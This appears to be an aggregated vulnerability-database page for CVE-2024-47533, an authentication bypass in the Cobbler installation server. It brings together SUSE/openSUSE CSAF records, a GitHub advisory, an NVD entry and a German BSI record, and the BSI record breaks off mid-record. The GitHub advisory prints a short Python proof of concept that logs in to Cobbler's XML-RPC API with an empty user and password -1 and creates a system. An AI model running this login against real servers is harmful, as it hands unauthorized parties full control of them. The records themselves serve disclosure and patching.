"product_id": "SUSE Package Hub 15 SP5:cobbler-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-bp155.2.3.2.noarch as component of SUSE Package Hub 15 SP5",
"product_id": "SUSE Package Hub 15 SP5:cobbler-tests-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch as component of SUSE Package Hub 15 SP5",
"product_id": "SUSE Package Hub 15 SP5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-bp155.2.3.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:cobbler-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-bp155.2.3.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:cobbler-tests-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
},
"product_reference": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-47533"
}
],
"notes": [
{
"category": "general",
"text": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Package Hub 15 SP5:cobbler-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-47533",
"url": "https://www.suse.com/security/cve/CVE-2024-47533"
},
{
"category": "external",
"summary": "SUSE Bug 1231332 for CVE-2024-47533",
"url": "https://bugzilla.suse.com/1231332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Package Hub 15 SP5:cobbler-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Package Hub 15 SP5:cobbler-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"SUSE Package Hub 15 SP5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"openSUSE Leap 15.5:cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-28T17:32:46Z",
"details": "critical"
}
],
"title": "CVE-2024-47533"
}
]
}
opensuse-su-2024:0370-1
Vulnerability from csaf_opensuse
Published
2024-11-21 11:21
Modified
2024-11-21 11:21
Summary
Security update for cobbler
Notes
Title of the patch
Security update for cobbler
Description of the patch
This update for cobbler fixes the following issues:
Update to 3.3.7
* Security: Fix issue that allowed anyone to connect to the API
as admin (CVE-2024-47533, boo#1231332)
* bind - Fix bug that prevents cname entries from being
generated successfully
* Fix build on RHEL9 based distributions (fence-agents-all split)
* Fix for Windows systems
* Docs: Add missing dependencies for source installation
* Fix issue that prevented systems from being synced when the
profile was edited
Patchnames
openSUSE-2024-370
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for cobbler",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for cobbler fixes the following issues:\n\nUpdate to 3.3.7\n\n* Security: Fix issue that allowed anyone to connect to the API\n as admin (CVE-2024-47533, boo#1231332)\n* bind - Fix bug that prevents cname entries from being\n generated successfully\n* Fix build on RHEL9 based distributions (fence-agents-all split)\n* Fix for Windows systems\n* Docs: Add missing dependencies for source installation\n* Fix issue that prevented systems from being synced when the\n profile was edited\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-2024-370",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_0370-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:0370-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NP6TUCO4CMINP73KVXN3DS2DMBSTQ3B4/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:0370-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NP6TUCO4CMINP73KVXN3DS2DMBSTQ3B4/"
},
{
"category": "self",
"summary": "SUSE Bug 1231332",
"url": "https://bugzilla.suse.com/1231332"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-47533 page",
"url": "https://www.suse.com/security/cve/CVE-2024-47533/"
}
],
"title": "Security update for cobbler",
"tracking": {
"current_release_date": "2024-11-21T11:21:20Z",
"generator": {
"date": "2024-11-21T11:21:20Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:0370-1",
"initial_release_date": "2024-11-21T11:21:20Z",
"revision_history": [
{
"date": "2024-11-21T11:21:20Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-bp156.2.6.1.noarch",
"product": {
"name": "cobbler-3.3.7-bp156.2.6.1.noarch",
"product_id": "cobbler-3.3.7-bp156.2.6.1.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"product": {
"name": "cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"product_id": "cobbler-tests-3.3.7-bp156.2.6.1.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"product": {
"name": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"product_id": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Package Hub 15 SP6",
"product": {
"name": "SUSE Package Hub 15 SP6",
"product_id": "SUSE Package Hub 15 SP6"
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-bp156.2.6.1.noarch as component of SUSE Package Hub 15 SP6",
"product_id": "SUSE Package Hub 15 SP6:cobbler-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-bp156.2.6.1.noarch as component of SUSE Package Hub 15 SP6",
"product_id": "SUSE Package Hub 15 SP6:cobbler-tests-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch as component of SUSE Package Hub 15 SP6",
"product_id": "SUSE Package Hub 15 SP6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "SUSE Package Hub 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-bp156.2.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:cobbler-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-bp156.2.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:cobbler-tests-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
},
"product_reference": "cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-47533"
}
],
"notes": [
{
"category": "general",
"text": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Package Hub 15 SP6:cobbler-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-47533",
"url": "https://www.suse.com/security/cve/CVE-2024-47533"
},
{
"category": "external",
"summary": "SUSE Bug 1231332 for CVE-2024-47533",
"url": "https://bugzilla.suse.com/1231332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Package Hub 15 SP6:cobbler-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Package Hub 15 SP6:cobbler-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"SUSE Package Hub 15 SP6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-3.3.7-bp156.2.6.1.noarch",
"openSUSE Leap 15.6:cobbler-tests-containers-3.3.7-bp156.2.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-21T11:21:20Z",
"details": "critical"
}
],
"title": "CVE-2024-47533"
}
]
}
ghsa-m26c-fcgh-cp6h
Vulnerability from github
Published
2024-11-18 20:00
Modified
2024-11-18 20:00
Severity ?
VLAI Severity ?
Summary
cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes
Details
Summary
utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user '' password -1 and make any changes.
Details
utils.py get_shared_secret: ``` def get_shared_secret() -> Union[str, int]: """ The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required. For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.
:return: The Cobbler secret which enables full access to Cobbler.
"""
try:
with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd:
data = fd.read()
except:
return -1
return str(data).strip()
Always returns `-1` because of the following exception:
binary mode doesn't take an encoding argument
```
This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.
PoC
```
!/usr/bin/python3
import ssl import xmlrpc.client
params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 } ssl_context = ssl._create_unverified_context()
url = '{proto}://{host}:{port}/cobbler_api'.format(**params) if ssl_context: conn = xmlrpc.client.ServerProxy(url, context=ssl_context) else: conn = xmlrpc.client.Server(url)
try: token = conn.login(params['username'], params['password']) except xmlrpc.client.Fault as e: print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, params)) except Exception as e: print("Connection to '{url}' failed. {error}".format(url=url, error=e, params))
print("Login success!")
system_id = conn.new_system(token) ```
Impact
This gives anyone with network access to a cobbler server full control of the server.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "cobbler"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "cobbler"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47533"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-18T20:00:56Z",
"nvd_published_at": "2024-11-18T17:15:11Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nutils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user \u0027\u0027 password -1 and make any changes.\n\n### Details\nutils.py get_shared_secret:\n```\ndef get_shared_secret() -\u003e Union[str, int]:\n \"\"\"\n The \u0027web.ss\u0027 file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange\n between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.\n For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.\n\n :return: The Cobbler secret which enables full access to Cobbler.\n \"\"\"\n\n try:\n with open(\"/var/lib/cobbler/web.ss\", \u0027rb\u0027, encoding=\u0027utf-8\u0027) as fd:\n data = fd.read()\n except:\n return -1\n return str(data).strip()\n```\nAlways returns `-1` because of the following exception:\n```\nbinary mode doesn\u0027t take an encoding argument\n```\n\nThis appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.\n\n### PoC\n```\n#!/usr/bin/python3\n\nimport ssl\nimport xmlrpc.client\n\nparams = { \u0027proto\u0027: \u0027https\u0027, \u0027host\u0027: \u0027COBBLER_SERVER\u0027, \u0027port\u0027: \u0027443\u0027, \u0027username\u0027: \u0027\u0027, \u0027password\u0027: -1 }\nssl_context = ssl._create_unverified_context()\n\nurl = \u0027{proto}://{host}:{port}/cobbler_api\u0027.format(**params)\nif ssl_context:\n conn = xmlrpc.client.ServerProxy(url, context=ssl_context)\nelse:\n conn = xmlrpc.client.Server(url)\n\ntry:\n token = conn.login(params[\u0027username\u0027], params[\u0027password\u0027])\nexcept xmlrpc.client.Fault as e:\n print(\"Failed to log in to Cobbler \u0027{url}\u0027 as \u0027{username}\u0027. {error}\".format(url=url, error=e, **params))\nexcept Exception as e:\n print(\"Connection to \u0027{url}\u0027 failed. {error}\".format(url=url, error=e, **params))\n\nprint(\"Login success!\")\n\nsystem_id = conn.new_system(token)\n```\n\n\n### Impact\nThis gives anyone with network access to a cobbler server full control of the server.\n",
"id": "GHSA-m26c-fcgh-cp6h",
"modified": "2024-11-18T20:00:56Z",
"published": "2024-11-18T20:00:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47533"
},
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0"
},
{
"type": "WEB",
"url": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda"
},
{
"type": "PACKAGE",
"url": "https://github.com/cobbler/cobbler"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes"
}
fkie_cve-2024-47533
Vulnerability from fkie_nvd
Published
2024-11-18 17:15
Modified
2024-11-19 21:57
Severity ?
Summary
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
References
| ▶ | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0 | ||
| security-advisories@github.com | https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda | ||
| security-advisories@github.com | https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue."
},
{
"lang": "es",
"value": "Cobbler, un servidor de instalaci\u00f3n de Linux que permite la configuraci\u00f3n r\u00e1pida de entornos de instalaci\u00f3n de red, tiene una vulnerabilidad de autenticaci\u00f3n incorrecta a partir de la versi\u00f3n 3.0.0 y anteriores a las versiones 3.2.3 y 3.3.7. `utils.get_shared_secret()` siempre devuelve `-1`, lo que permite que cualquiera se conecte a Cobbler XML-RPC como usuario `\u0027\u0027` contrase\u00f1a `-1` y realice cualquier cambio. Esto le da a cualquier persona con acceso de red a un servidor Cobbler control total del servidor. Las versiones 3.2.3 y 3.3.7 solucionan el problema."
}
],
"id": "CVE-2024-47533",
"lastModified": "2024-11-19T21:57:56.293",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-11-18T17:15:11.563",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
wid-sec-w-2024-3491
Vulnerability from csaf_certbund
Published
2024-11-18 23:00
Modified
2024-11-28 23:00
Summary
cobbler: Schwachstelle ermöglicht Erlangen von Administratorrechten
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Cobbler ist ein Linux Installationsserver, welcher die schnelle Einrichtung von Netzwerk-Installationsumgebungen ermöglicht.
Angriff
Ein entfernter, anonymer Angreifer kann eine Schwachstelle in cobbler ausnutzen, um Administratorrechte zu erlangen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Cobbler ist ein Linux Installationsserver, welcher die schnelle Einrichtung von Netzwerk-Installationsumgebungen erm\u00f6glicht.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in cobbler ausnutzen, um Administratorrechte zu erlangen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-3491 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3491.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-3491 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3491"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:4006-1 vom 2024-11-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019837.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:4007-1 vom 2024-11-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019836.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2024:4009-1 vom 2024-11-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019835.html"
},
{
"category": "external",
"summary": "Cobbler Security Advisory vom 2024-11-18",
"url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2024:0370-1 vom 2024-11-21",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/message/NP6TUCO4CMINP73KVXN3DS2DMBSTQ3B4/"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2024:14512-1 vom 2024-11-21",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2LAXV37YWWRKUA3I3RM5AVTLLGOJCZUG/"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2024:0382-1 vom 2024-11-29",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/CGWWFM26ZMG5SCPMDNQQNYHHTROXVX2Q/"
}
],
"source_lang": "en-US",
"title": "cobbler: Schwachstelle erm\u00f6glicht Erlangen von Administratorrechten",
"tracking": {
"current_release_date": "2024-11-28T23:00:00.000+00:00",
"generator": {
"date": "2024-11-29T09:08:57.677+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2024-3491",
"initial_release_date": "2024-11-18T23:00:00.000+00:00",
"revision_history": [
{
"date": "2024-11-18T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-11-21T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von openSUSE aufgenommen"
},
{
"date": "2024-11-28T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von openSUSE aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c3.3.7",
"product": {
"name": "Open Source cobbler \u003c3.3.7",
"product_id": "T039241"
}
},
{
"category": "product_version",
"name": "3.3.7",
"product": {
"name": "Open Source cobbler 3.3.7",
"product_id": "T039241-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:cobbler:cobbler:3.3.7"
}
}
},
{
"category": "product_version_range",
"name": "\u003c3.2.3",
"product": {
"name": "Open Source cobbler \u003c3.2.3",
"product_id": "T039242"
}
},
{
"category": "product_version",
"name": "3.2.3",
"product": {
"name": "Open Source cobbler 3.2.3",
"product_id": "T039242-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:cobbler:cobbler:3.2.3"
}
}
}
],
"category": "product_name",
"name": "cobbler"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c4.3.14",
"product": {
"name": "SUSE Manager \u003c4.3.14",
"product_id": "T039239"
}
},
{
"category": "product_version",
"name": "4.3.14",
"product": {
"name": "SUSE Manager 4.3.14",
"product_id": "T039239-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:suse:manager:4.3.14"
}
}
}
],
"category": "product_name",
"name": "Manager"
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
